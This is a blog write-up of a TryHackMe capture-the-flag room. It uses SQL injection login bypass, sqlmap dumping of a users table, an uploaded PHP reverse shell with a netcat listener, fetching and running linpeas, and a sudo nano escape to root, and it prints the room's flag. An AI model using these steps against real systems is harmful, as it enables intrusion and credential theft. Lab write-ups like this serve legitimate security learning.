Post

Gallery

Try to exploit our image gallery system

Posted
Preview Image
By
4 min read
Gallery

Introduction

First lets start the machine. Desktop View Let's answer the questions

How Many Ports Are open?

Firt’s Lets can the IP 10.10.27.38 nmap -sCV 10.10.27.38 Desktop View There are two ports open, 80, 8080 Let’s navigate to http://10.10.27.38:8080 Desktop View So I think that is vulnerable to sql injection so i tried to log with 'OR 1=1-- - user:pass Desktop View It works, now let’s go to https://www.exploit-db.com/ then in search filter type Simple Image Gallery Desktop View So in that db says that is vulnerable to sql injection, let’s read that exploit. the exploit says this. Desktop View let's do the same as the exploit Go to Albums Desktop View Click on albums Then click on Sample images, once there, turn on intercept in burp, and turn on foxy proxy Or your favorite way Desktop View Once you got burp suite on click on whatever image, i click on test.jpg Desktop View I intercepted the request, As the exploit said, we have to save the request now. i saved the request as gallery.test Let’s run the command

1

sqlmap -r gallery.test --dbs
  1. sqlmap invoke sqlmap
  2. -r gallery.test Use a file with a http request to test sql injections
  3. --dbs Enumerates the available databases if a SQL vulnerability is found.

After that we found this. Desktop View Now that we found DB Let’s run this command

1

sqlmap -r gallery.test -D gallery_db --tables --dbs
  1. -D selects the database
  2. --tables Enumerates the tables within the select database

After run that command we found something more. Desktop View Now that we got those tables, users sounds interestings let’s run this command

1

sqlmap -r gallery.test -D gallery_db -T users --dump
  1. -T selects the users table
  2. --dump Extracts and shows the entire content of the users table.

After running that command we got this Desktop View We got almost all answers os the task 1 Let’s go back to http://10.10.27.38:8080 and click on album, go to sample images, then there click on add new before upload something, go to https://pentestmonkey.net/tools/web-shells/php-reverse-shell and configure the script After you configure your script, Then upload the file Desktop View before doing something, lets set up, a Listener in our terminal

1

nc -nlvp 4444

nc calls netcat

  1. n Avoids netcat dns resolution
  2. l Puts Netcat in listening mode, waiting for incoming connections.
  3. v Enables Verbose modeMore details
  4. p Specifies the port to listen on
  5. 4444 The chosen port number.

then Click on the file that we uploaded before Desktop View We got the shell As you can see i tried to read de user.txt but i dont got permissions Desktop View Then in the target machine I move to, cd /var/www/html In that directory I got enough permissions

Then in my own machine I set up a server to get linpeas.sh to the target machine Desktop View

In the target machine I run this command to get the linpeas.sh

1

wget http://0.0.0.0:8080/linpeas.sh

Then now let’s run the linpeas Before that give the execution permissions with chmod +x linpeas.sh Then run ./linpeas.sh Desktop View After run the script, we found this. Desktop View This means that mike was trying to log but by errors he put the pasword within a command But let’s confirms firts Let’s see the Bash_history Desktop View As we can see he was trying to do something but he miss the bash_history Now let'schange the user with su mike with the password b3stpassw0rdbr0xx and it’s works Now let’s read the user.txt Desktop View{ :width=”1200” height=”630” }

After that if we type says this

1
2
3
4
5
6
7

sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

The path /opt/rootkit.sh says this

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

 #!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

If we type this

1
2
3
4

sudo /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
read
Error opening terminal: unknown.

There is an error then let’s do this export TERM=xterm to export the terminal Go to https://gtfobins.github.io/gtfobins/nano/#sudo Desktop View

With the export TERM=xterm we have to access to nano, when with run the script with

1
2

sudo /bin/bash /opt/rootkit.sh
`Then pulse CTRL + R and type' reset; sh 1>&0 2>&0 and CTRL + X after that we have go to the root access`

Here we go Desktop View

1
2
3
4
5

# whoami
root
cd root/
cat root.txt
THM{ba87e0dfe5903adfa6b8b450ad7567bafde87}

NOTE

If you see any dramatical errors excuse me, IM learning english :(

Tryhackme
CTF
This post is licensed under CC BY 4.0 by the author.

Trending Tags

CTF Labs script